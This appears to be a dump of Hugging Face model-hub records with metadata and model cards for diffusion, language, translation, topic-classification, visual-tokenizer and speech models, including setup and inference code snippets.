quantize(pipeline_fp8.vae, weights=qfloat8)
quantize(pipeline_fp8.text_encoder, weights=qfloat8)
quantize(pipeline_fp8.unet, weights=qfloat8)
# Save directory
save_dir_fp8 = "ghibli_sd_fp8"
os.makedirs(save_dir_fp8, exist_ok=True)
# Save the entire pipeline to ensure model_index.json is included
pipeline_fp8.save_pretrained(save_dir_fp8)
```
## Usage
### Install Dependencies
```bash
pip install -q "optimum-intel[openvino,diffusers]" openvino
```
### Import Libraries
```python
import torch
from diffusers import StableDiffusionPipeline
```
###
```python
device = "cuda" if torch.cuda.is_available() else "cpu"
model_id = "danhtran2mind/ghibli-fine-tuned-sd-2.1-fp8"
pipe = StableDiffusionPipeline.from_pretrained(model_id, torch_dtype=torch.float16)
pipe.to(device)
``` |
s3171103/DeepSeek-R1-Distill-Qwen-14B-GRPO | s3171103 | 2025-05-30T08:41:45Z | 2 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"generated_from_trainer",
"trl",
"grpo",
"conversational",
"arxiv:2402.03300",
"base_model:deepseek-ai/DeepSeek-R1-Distill-Qwen-14B",
"base_model:finetune:deepseek-ai/DeepSeek-R1-Distill-Qwen-14B",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-05-29T09:19:01Z | ---
base_model: deepseek-ai/DeepSeek-R1-Distill-Qwen-14B
library_name: transformers
model_name: DeepSeek-R1-Distill-Qwen-14B-GRPO
tags:
- generated_from_trainer
- trl
- grpo
licence: license
---
# Model Card for DeepSeek-R1-Distill-Qwen-14B-GRPO
This model is a fine-tuned version of [deepseek-ai/DeepSeek-R1-Distill-Qwen-14B](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-14B).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="s3171103/DeepSeek-R1-Distill-Qwen-14B-GRPO", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/kartd80165-national-yang-ming-chiao-tung-university/huggingface/runs/9qi8sw85)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.18.0.dev0
- Transformers: 4.52.0.dev0
- Pytorch: 2.6.0
- Datasets: 3.6.0
- Tokenizers: 0.21.1
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
selftok-team/SelftokTokenizer | selftok-team | 2025-05-30T08:40:34Z | 0 | 2 | null | [
"arxiv:2505.07538",
"arxiv:2504.14666",
"region:us"
] | null | 2025-05-18T10:08:11Z | <div align="center">
<h2>⚡ Selftok: Discrete Visual Tokens of Autoregression, by Diffusion, and for Reasoning</h2>
<p><strong>Selftok Team, Media Technology Institute, Huawei</strong></p>
<p>
<a href="LICENSE">
<img src="https://img.shields.io/badge/license-MIT-blue" alt="license">
</a>
<a href="https://selftok-team.github.io/report/">
<img src="https://img.shields.io/badge/Project-Page-blue?logo=githubpages" alt="project page">
</a>
<a href="https://arxiv.org/abs/2505.07538">
<img src="https://img.shields.io/badge/arXiv-2505.07538-b31b1b?logo=arxiv" alt="arXiv">
</a>
</p>
</div>
</div>
<div align="center">
<img src="https://raw.githubusercontent.com/selftok-team/SelftokTokenizer/main/assets/recon.PNG" alt="Visualization" width="100%">
</div>
## ✨ Highlights
- Propose Self-Consistency Tokenizer (Selftok), a **SOTA tokenizer** that achieves both high-quality reconstruction and high compression bit rate.
- Selftok offers an elegant and minimalist approach to unify diffusion and AR for vision-language models (VLM).
- Our VLM achieves both SOTA visual comprehension and generation performances.
## 📰 News
- **[2025.05.18]** The weights of tokenizer for Selftok are available on [HuggingFace](https://huggingface.co/selftok-team/SelftokTokenizer/tree/main).
- **[2025.05.15]** We have released the code of tokenizer for Selftok! The weights will be released soon.
- **[2025.05.12]** We have released the paper of Selftok ([arXiv](https://arxiv.org/abs/2505.07538))!
- **[2025.04.04]** Our preliminary work **DDT-LLaMA** ([project page](https://ddt-llama.github.io/)) has been accepted as an **Oral Presentation** at CVPR 2025!
## 📄 Introduction
We completely discard the conventional spatial prior in image representation and introduce a novel discrete visual tokenizer: **Self-Consistency Tokenizer (Selftok)**. At its design core, we compose an autoregressive (AR) prior—mirroring the causal structure of language—into visual tokens by using the reverse diffusion process of image generation. The AR property makes Selftok fundamentally distinct from traditional spatial tokens in the following two key ways:
- *Selftok offers an elegant and minimalist approach to unify diffusion and AR for vision-language models*: By representing images with Selftok tokens, we can train vision-language models (VLMs) using a purely discrete autoregressive architecture—like that in LLMs—without requiring additional modules or training objectives.
- *We theoretically show that the AR prior satisfies the Bellman equation*, whereas the spatial prior does not. Therefore, Selftok supports reinforcement learning (RL) for visual generation with effectiveness comparable to that achieved in LLMs.
Besides the AR property, *Selftok is also a SOTA tokenizer that achieves both high-quality reconstruction and high compression bit rate*. After representing the training images as Selftok tokens, as a pure AR model, our VLM achieves both SOTA visual comprehension and generation performances. Impressively, without using any text-image training pairs, a simple policy gradient RL working in the visual tokens can significantly boost the visual generation benchmark, surpassing all the existing models by a large margin.
Therefore, we believe that Selftok effectively addresses the long-standing challenge that visual tokens cannot support effective RL. When combined with the well-established strengths of RL in LLMs, this brings us one step closer to realizing a truly multimodal LLM.
## 📝 Results
- **SoTA** Reconstruction Performance on ImageNet 256x256
<div align="center">
<img src="https://raw.githubusercontent.com/selftok-team/SelftokTokenizer/main/assets/results_table.PNG" alt="results" width="80%">
</div>
## 🎯 How to Use
---
### 🛠️ Installation
```bash
conda create -n selftok python=3.10 # or your preferred version
conda activate selftok
# For Ascend environment
pip install -r requirements.txt
# For GPU environment
pip install -r requirements_gpu.txt
```
---
### 🧠 Tokenizer Inference with Pre-trained Models
* **Download Pretrained Weights**
| Tokenizer | Image Resolution | # Tokens | PSNR |
|:-------------------------------:|:----------:|:--------:|:-----:|
| Selftok w/o Renderer ([HuggingFace](https://huggingface.co/selftok-team/SelftokTokenizer/blob/main/tokenizer_512_ckpt.pth)) | 256×256 | 512 | 21.86 |
| Selftok w/ Renderer ([HuggingFace](https://huggingface.co/selftok-team/SelftokTokenizer/blob/main/renderer_512_ckpt.pth)) | 256×256 | 512 | 24.14 |
| Selftok w/o Renderer ([HuggingFace](https://huggingface.co/selftok-team/SelftokTokenizer/blob/main/tokenizer_1024_ckpt.pth)) | 256×256 | 1024 | 23.06 |
| Selftok w/ Renderer ([HuggingFace](https://huggingface.co/selftok-team/SelftokTokenizer/blob/main/renderer_1024_ckpt.pth)) | 256×256 | 1024 | 26.30 |
* **Pipeline Overview**
The inference pipeline includes three key stages:
1. **Tokenization** – Convert images into discrete token sequences.
2. **Diffusion Decoding** – Reconstruct images using a 50-step diffusion model.
3. **One-step Decoding** – Quickly reconstruct images using a fast renderer.
```
bash
git clone https://github.com/selftok-team/SelftokTokenizer.git
cd ./SelftokTokenizer
```
#### 1. Tokenization
This script demonstrates how to convert images into token sequences using a pretrained Selftok model.
```python
import argparse
from mimogpt.engine.utils import parse_args_from_yaml
from torchvision import transforms
from PIL import Image
import torch
import numpy as np
from mimogpt.infer.SelftokPipeline import SelftokPipeline
from mimogpt.infer.SelftokPipeline import NormalizeToTensor
from torchvision.utils import save_image
parser = argparse.ArgumentParser()
parser.add_argument("--yml-path", type=str, default="path/to/your/config.yml")
parser.add_argument("--pretrained", type=str, default="path/to/your/ckpt.pth")
parser.add_argument("--data_size", type=int, default=256)
cfg = parse_args_from_yaml(args.yml_path)
model = SelftokPipeline(cfg=cfg, ckpt_path=args.pretrained, datasize=args.data_size, device='cuda')
img_transform = transforms.Compose([
transforms.Resize(args.data_size),
transforms.CenterCrop(args.data_size),
NormalizeToTensor(),
])
image_paths = ['path/to/image1.png', 'path/to/image2.png']
images = [img_transform(Image.open(p)) for p in image_paths]
images = torch.stack(images).to('cuda')
tokens = model.encoding(images, device='cuda')
np.save('token.npy', tokens.detach().cpu().numpy())
```
---
#### 2. Diffusion Decoding
Reconstruct images from token sequences using the full diffusion model (50 steps):
```python
import argparse
from mimogpt.engine.utils import parse_args_from_yaml
from torchvision import transforms
from PIL import Image
import torch
import numpy as np
from mimogpt.infer.SelftokPipeline import SelftokPipeline
from mimogpt.infer.SelftokPipeline import NormalizeToTensor
from torchvision.utils import save_image
parser = argparse.ArgumentParser()
parser.add_argument("--yml-path", type=str, default="path/to/your/config.yml")
parser.add_argument("--pretrained", type=str, default="path/to/your/ckpt.pth")
parser.add_argument("--data_size", type=int, default=256)
cfg = parse_args_from_yaml(args.yml_path)
model = SelftokPipeline(cfg=cfg, ckpt_path=args.pretrained, datasize=args.data_size, device='cuda')
tokens = np.load('token.npy')
images = model.decoding(tokens, device='cuda')
for b, img in enumerate(images):
save_image(img, f"re_{b}.png")
```
---
#### 3. One-step Renderer Decoding
Reconstruct images using a fast, one-step renderer:
```python
import argparse
from mimogpt.engine.utils import parse_args_from_yaml
from torchvision import transforms
from PIL import Image
import torch
import numpy as np
from mimogpt.infer.SelftokPipeline import SelftokPipeline
from mimogpt.infer.SelftokPipeline import NormalizeToTensor
from torchvision.utils import save_image
parser = argparse.ArgumentParser()
parser.add_argument("--yml-path", type=str, default="path/to/your/config.yml")
parser.add_argument("--pretrained", type=str, default="path/to/your/ckpt.pth")
parser.add_argument("--data_size", type=int, default=256)
cfg = parse_args_from_yaml(args.yml_path)
model = SelftokPipeline(cfg=cfg, ckpt_path=args.pretrained, datasize=args.data_size, device='cuda')
tokens = np.load('token.npy')
images = model.decoding_with_renderer(tokens, device='cuda')
for b, img in enumerate(images):
save_image(img, f"render_{b}.png")
```
---
## Notes
* Replace all `path/to/...` with actual paths on your system or object storage.
* The scripts assume CUDA is available; modify `device='cuda'` to `'cpu'` if running on CPU.
* The scripts support both Ascend and GPU. If inference with GPU, replace `mimogpt.infer.SelftokPipeline` with `mimogpt.infer.SelftokPipeline_GPU`.
* If you use Selftok Tokenizer for AR training, note that we decoder the image token sequence **reversely**!
## 🎮 Train Your Own Models
The training code is currently under preparation and will be released shortly. Please stay tuned for updates.
## 📝 Citation
If you find our work useful, please cite our related paper:
```
# Arxiv
@article{wang2025discretevisualtokensautoregression,
title={Discrete Visual Tokens of Autoregression, by Diffusion, and for Reasoning},
author={Bohan Wang and Zhongqi Yue and Fengda Zhang and Shuo Chen and Li'an Bi and Junzhe Zhang and Xue Song and Kennard Yanting Chan and Jiachun Pan and Weijia Wu and Mingze Zhou and Wang Lin and Kaihang Pan and Saining Zhang and Liyu Jia and Wentao Hu and Wei Zhao and Hanwang Zhang},
year={2025},
eprint={2505.07538},
archivePrefix={arXiv},
primaryClass={cs.CV},
url={https://arxiv.org/abs/2505.07538},
}
# CVPR 2025
@article{pan2025generative,
title={Generative Multimodal Pretraining with Discrete Diffusion Timestep Tokens},
author={Pan, Kaihang and Lin, Wang and Yue, Zhongqi and Ao, Tenglong and Jia, Liyu and Zhao, Wei and Li, Juncheng and Tang, Siliang and Zhang, Hanwang},
journal={arXiv preprint arXiv:2504.14666},
year={2025}
}
```
## Disclaimer
This open-source project is **not an official Huawei product**. Huawei is **not responsible for providing support** or maintenance for this project.
|
np-cr/testing-llama_128 | np-cr | 2025-05-30T08:38:50Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-05-30T08:30:02Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
LarryAIDraw/hyacine_pony | LarryAIDraw | 2025-05-30T08:27:59Z | 0 | 0 | null | [
"license:creativeml-openrail-m",
"region:us"
] | null | 2025-05-30T08:19:32Z | ---
license: creativeml-openrail-m
---
https://civitai.com/models/1628057/hyacine-pony?modelVersionId=1842707 |
LarryAIDraw/quency_escape_queen_nikke_pdxl_goofy | LarryAIDraw | 2025-05-30T08:27:46Z | 0 | 0 | null | [
"license:creativeml-openrail-m",
"region:us"
] | null | 2025-05-30T08:19:10Z | ---
license: creativeml-openrail-m
---
https://civitai.com/models/953196/quency-escape-queen-goddess-of-victory-nikkee-or-goofy-ai?modelVersionId=1067182 |
LarryAIDraw/Noir_Black_Rabbit_Nikke_The_Goddess_of_Victory | LarryAIDraw | 2025-05-30T08:27:32Z | 0 | 0 | null | [
"license:creativeml-openrail-m",
"region:us"
] | null | 2025-05-30T08:17:37Z | ---
license: creativeml-openrail-m
---
https://civitai.com/models/974589/noir-black-rabbit-nikke-the-goddess-of-victory?modelVersionId=1091335 |
jinx2321/nllb-1e4-paper-distilled-1 | jinx2321 | 2025-05-30T08:24:09Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"m2m_100",
"text2text-generation",
"generated_from_trainer",
"base_model:jinx2321/nllb-1e4-paper",
"base_model:finetune:jinx2321/nllb-1e4-paper",
"license:cc-by-nc-4.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2025-05-30T06:59:27Z | ---
library_name: transformers
license: cc-by-nc-4.0
base_model: jinx2321/nllb-1e4-paper
tags:
- generated_from_trainer
model-index:
- name: nllb-1e4-paper-distilled-1
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# nllb-1e4-paper-distilled-1
This model is a fine-tuned version of [jinx2321/nllb-1e4-paper](https://huggingface.co/jinx2321/nllb-1e4-paper) on the None dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0001
- train_batch_size: 128
- eval_batch_size: 8
- seed: 42
- optimizer: Use adamw_torch with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 3
### Training results
### Framework versions
- Transformers 4.52.0.dev0
- Pytorch 2.6.0+cu124
- Datasets 3.4.1
- Tokenizers 0.21.1
|
poltextlab/xlm-roberta-large-pooled-cap-media2 | poltextlab | 2025-05-30T08:23:21Z | 4 | 0 | transformers | [
"transformers",
"safetensors",
"xlm-roberta",
"text-classification",
"zero-shot-classification",
"pytorch",
"en",
"base_model:FacebookAI/xlm-roberta-large",
"base_model:finetune:FacebookAI/xlm-roberta-large",
"license:mit",
"model-index",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2025-05-29T12:39:11Z | ---
model-index:
- name: xlm-roberta-large
results:
- task:
type: text-classification
dataset:
name: media2_v2_25_05_21_test.csv
type: media2_v2_25_05_21_test.csv
metrics:
- name: Accuracy
type: Accuracy
value: 79
- name: F1-Score
type: F1-Score
value: 79
source:
name: Open LLM Leaderboard
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard
tags:
- zero-shot-classification
- text-classification
- pytorch
metrics:
- recall
- precision
- f1-score
language:
- en
base_model:
- FacebookAI/xlm-roberta-large
pipeline_tag: text-classification
library_name: transformers
license: mit
extra_gated_prompt: Our models are intended for academic use only. If you are not
affiliated with an academic institution, please provide a rationale for using our
models. Please allow us a few business days to manually review subscriptions.
extra_gated_fields:
Name: text
Country: country
Institution: text
Institution Email: text
Please specify your academic use case: text
---
# xlm-roberta-large-pooled-cap-media2
## Model description
An `xlm-roberta-large` model finetuned on multilingual (english, german, hungarian, spanish, slovakian) training data labelled with
[major topic codes](https://www.comparativeagendas.net/pages/master-codebook) from the [Comparative Agendas Project](https://www.comparativeagendas.net/).
Furthermore we used the follwoing 18 media codes:
* State and Local Government Administration (24)
* Weather (25)
* Fires, emergencies and natural disasters (26)
* Crime and trials (27)
* Arts, culture, entertainment and history (28)
* Style and fashion (29)
* Food (30)
* Travel (31)
* Wellbeing and learning (32)
* Personal finance and real estate (33)
* Personal technology and popular science (34)
* Churches and Religion (35)
* Celebrities and human interest (36)
* Obituaries and death notices (37)
* Sports (38)
* Crosswords, puzzles, comics (39)
* Media production/internal, letters (40)
* Advertisements (41)
## How to use the model
```python
from transformers import AutoTokenizer, pipeline
tokenizer = AutoTokenizer.from_pretrained("xlm-roberta-large")
pipe = pipeline(
model="poltextlab/xlm-roberta-large-pooled-cap-media2",
task="text-classification",
tokenizer=tokenizer,
use_fast=False,
token="<your_hf_read_only_token>"
)
text = "We will place an immediate 6-month halt on the finance driven closure of beds and wards, and set up an independent audit of needs and facilities."
pipe(text)
```
### Gated access
Due to the gated access, you must pass the `token` parameter when loading the model. In earlier versions of the Transformers package, you may need to use the `use_auth_token` parameter instead.
## Model performance
The model was evaluated on a test set of 74322 english examples.<br>
* Accuracy: **0.79**.
* Precision: **0.77**.
* Recall: **0.77**
* Weighted Average F1-score: **0.79**

### Heatmap

### Classification Report
| Class | precision | recall | f1-score | support |
|:-----------------------------------------------|------------:|---------:|-----------:|----------:|
| Macroeconomics (1) | 0.71 | 0.75 | 0.73 | 2471 |
| Civil Rights (2) | 0.71 | 0.66 | 0.69 | 1886 |
| Health (3) | 0.81 | 0.83 | 0.82 | 2471 |
| Agriculture (4) | 0.77 | 0.76 | 0.76 | 811 |
| Labor (5) | 0.72 | 0.7 | 0.71 | 1277 |
| Education (6) | 0.84 | 0.87 | 0.86 | 2080 |
| Environment (7) | 0.76 | 0.79 | 0.78 | 1283 |
| Energy (8) | 0.79 | 0.83 | 0.81 | 1370 |
| Immigration (9) | 0.71 | 0.78 | 0.74 | 514 |
| Transportation (10) | 0.8 | 0.82 | 0.81 | 2375 |
| Law and Crime (12) | 0.68 | 0.67 | 0.67 | 2471 |
| Social Welfare (13) | 0.67 | 0.69 | 0.68 | 683 |
| Housing (14) | 0.72 | 0.71 | 0.71 | 1023 |
| Banking, Finance, and Domestic Commerce (15) | 0.72 | 0.68 | 0.7 | 2471 |
| Defense (16) | 0.74 | 0.77 | 0.75 | 2471 |
| Technology (17) | 0.73 | 0.73 | 0.73 | 1375 |
| Foreign Trade (18) | 0.71 | 0.64 | 0.67 | 533 |
| International Affairs (19) | 0.69 | 0.62 | 0.66 | 2471 |
| Government Operations (20) | 0.72 | 0.65 | 0.68 | 2471 |
| Public Lands (21) | 0.64 | 0.64 | 0.64 | 554 |
| Culture (23) | 0.73 | 0.75 | 0.74 | 2142 |
| State and Local Government Administration (24) | 0.79 | 0.73 | 0.76 | 2471 |
| Weather (25) | 0.98 | 0.98 | 0.98 | 2471 |
| Fires, emergencies and natural disasters (26) | 0.96 | 0.98 | 0.97 | 2471 |
| Crime and trials (27) | 0.77 | 0.84 | 0.8 | 2467 |
| Arts, culture, entertainment and history (28) | 0.78 | 0.72 | 0.75 | 2423 |
| Style and fashion (29) | 0.8 | 0.69 | 0.74 | 2407 |
| Food (30) | 0.79 | 0.83 | 0.81 | 2210 |
| Travel (31) | 0.8 | 0.86 | 0.83 | 2095 |
| Wellbeing and learning (32) | 0.77 | 0.81 | 0.79 | 2376 |
| Personal finance and real estate (33) | 0.84 | 0.85 | 0.85 | 2222 |
| Personal technology and popular science (34) | 0.82 | 0.83 | 0.82 | 2388 |
| Churches and Religion (35) | 0.92 | 0.94 | 0.93 | 2469 |
| Celebrities and human interest (36) | 0.84 | 0.87 | 0.86 | 2454 |
| Obituaries and death notices (37) | 0.88 | 0.92 | 0.9 | 2407 |
| Sports (38) | 0.89 | 0.89 | 0.89 | 2423 |
| Crosswords, puzzles, comics (39) | 0.96 | 0.95 | 0.96 | 126 |
| Media production/internal, letters (40) | 0.9 | 0.9 | 0.9 | 763 |
| Advertisements (41) | 0 | 0 | 0 | 5 |
| No Policy and No Media Content (998) | 0.82 | 0.8 | 0.81 | 2471 |
| accuracy | 0.79 | 0.79 | 0.79 | 0.79 |
| macro avg | 0.77 | 0.77 | 0.77 | 74322 |
| weighted avg | 0.79 | 0.79 | 0.79 | 74322 |
## Inference platform
This model is used by the [CAP Babel Machine](https://babel.poltextlab.com), an open-source and free natural language processing tool, designed to simplify and speed up projects for comparative research.
## Cooperation
Model performance can be significantly improved by extending our training sets. We appreciate every submission of CAP-coded corpora (of any domain and language) at poltextlab{at}poltextlab{dot}com or by using the [CAP Babel Machine](https://babel.poltextlab.com).
## Debugging and issues
This architecture uses the `sentencepiece` tokenizer. In order to run the model before `transformers==4.27` you need to install it manually.
If you encounter a `RuntimeError` when loading the model using the `from_pretrained()` method, adding `ignore_mismatched_sizes=True` should solve the issue. |
HeOeH/ttmamba | HeOeH | 2025-05-30T08:20:45Z | 0 | 0 | null | [
"region:us"
] | null | 2025-05-30T08:10:43Z | Found. Redirecting to https://cdn-lfs-us-1.hf.co/repos/21/ed/21edfa7c4300869037612716edf31f620e4f7910b176b586add3ff2539002b29/4bcf87ecfbbb8e07a01b21415a970c8b53a5283bf6872b657040d3f45c9241f7?response-content-disposition=inline%3B+filename*%3DUTF-8%27%27README.md%3B+filename%3D%22README.md%22%3B&response-content-type=text%2Fmarkdown&Expires=1748612772&Policy=eyJTdGF0ZW1lbnQiOlt7IkNvbmRpdGlvbiI6eyJEYXRlTGVzc1RoYW4iOnsiQVdTOkVwb2NoVGltZSI6MTc0ODYxMjc3Mn19LCJSZXNvdXJjZSI6Imh0dHBzOi8vY2RuLWxmcy11cy0xLmhmLmNvL3JlcG9zLzIxL2VkLzIxZWRmYTdjNDMwMDg2OTAzNzYxMjcxNmVkZjMxZjYyMGU0Zjc5MTBiMTc2YjU4NmFkZDNmZjI1MzkwMDJiMjkvNGJjZjg3ZWNmYmJiOGUwN2EwMWIyMTQxNWE5NzBjOGI1M2E1MjgzYmY2ODcyYjY1NzA0MGQzZjQ1YzkyNDFmNz9yZXNwb25zZS1jb250ZW50LWRpc3Bvc2l0aW9uPSomcmVzcG9uc2UtY29udGVudC10eXBlPSoifV19&Signature=okAAuHtV0vLlALAirj6%7Ew47Wsc0rzkXXIdkOjJStwnu1b%7EXIuvnl4ZaiBIn3gzOVsAP1lDqRN4ZUeLdsSUBZ-R7iMvQisDgUOafBFwJb9WmPhjnYDiijt7rbFo8olQUKbNJ4PJnuzjtE%7E4TimfbX%7EJYafeTICmUmZZXSXTlq6S7zdB991nCYcWDJTiW33EKQEgtQCpDGbx-tL3mQhCu2fbL13jGShbX%7Es5-afyn9R1uB6KGw7hKYFb7eN1cGaOuuxgQmhasUUJd0PoEN0BNLvOXyND04UWBMImEfNbR--JNkcSGBJqGcL8FSiEm8zJGacu8GyKxRPFGfiPpudlGeuw__&Key-Pair-Id=K24J24Z295AEI9 |
RoyRoyRpy/test_fine-tuned-visionllama_100_epo1 | RoyRoyRpy | 2025-05-30T08:14:34Z | 0 | 0 | peft | [
"peft",
"tensorboard",
"safetensors",
"trl",
"sft",
"generated_from_trainer",
"base_model:meta-llama/Llama-3.2-11B-Vision-Instruct",
"base_model:adapter:meta-llama/Llama-3.2-11B-Vision-Instruct",
"license:llama3.2",
"region:us"
] | null | 2025-05-30T08:14:08Z | ---
library_name: peft
license: llama3.2
base_model: meta-llama/Llama-3.2-11B-Vision-Instruct
tags:
- trl
- sft
- generated_from_trainer
model-index:
- name: test_fine-tuned-visionllama_100_epo1
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# test_fine-tuned-visionllama_100_epo1
This model is a fine-tuned version of [meta-llama/Llama-3.2-11B-Vision-Instruct](https://huggingface.co/meta-llama/Llama-3.2-11B-Vision-Instruct) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0002
- train_batch_size: 10
- eval_batch_size: 8
- seed: 42
- gradient_accumulation_steps: 8
- total_train_batch_size: 80
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: constant
- lr_scheduler_warmup_ratio: 0.03
- num_epochs: 1
### Training results
### Framework versions
- PEFT 0.13.0
- Transformers 4.45.1
- Pytorch 2.4.0+cu121
- Datasets 3.0.1
- Tokenizers 0.20.3 |
FBK-MT/fama-medium | FBK-MT | 2025-05-30T08:14:10Z | 5 | 1 | null | [
"safetensors",
"conformer_encoder_decoder",
"speech",
"speech recognition",
"speech translation",
"ASR",
"ST",
"custom_code",
"en",
"it",
"dataset:FBK-MT/mosel",
"dataset:facebook/covost2",
"dataset:openslr/librispeech_asr",
"dataset:facebook/voxpopuli",
"arxiv:2505.22759",
"license:cc-by-4.0",
"region:us"
] | null | 2025-03-31T17:01:17Z | ---
license: cc-by-4.0
language:
- en
- it
datasets:
- FBK-MT/mosel
- facebook/covost2
- openslr/librispeech_asr
- facebook/voxpopuli
metrics:
- comet
- wer
tags:
- speech
- speech recognition
- speech translation
- ASR
- ST
---
# FAMA-medium
<div>
<img src="FAMA.png" width="100%" alt="FAMA" />
</div>
## Table of Contents
1. [Overview](#overview)
2. [Usage](#Usage)
3. [Results](#Results)
4. [License](#license)
5. [Citation](#citation)
## Overview
FAMA is the first family of large-scale open-science SFMs for English and
Italian trained on [over 150k hours of exclusively open-source(OS)-compliant speech data](https://huggingface.co/datasets/FBK-MT/fama-data).
FAMA models achieve [remarkable results](#results), with ASR and ST improvements on average across languages compared to OWSM,
and is competitive in terms of ASR performance with the Whisper model family while being up to 8 times faster.
All the artifacts used for realizing FAMA models, including codebase, datasets, and models
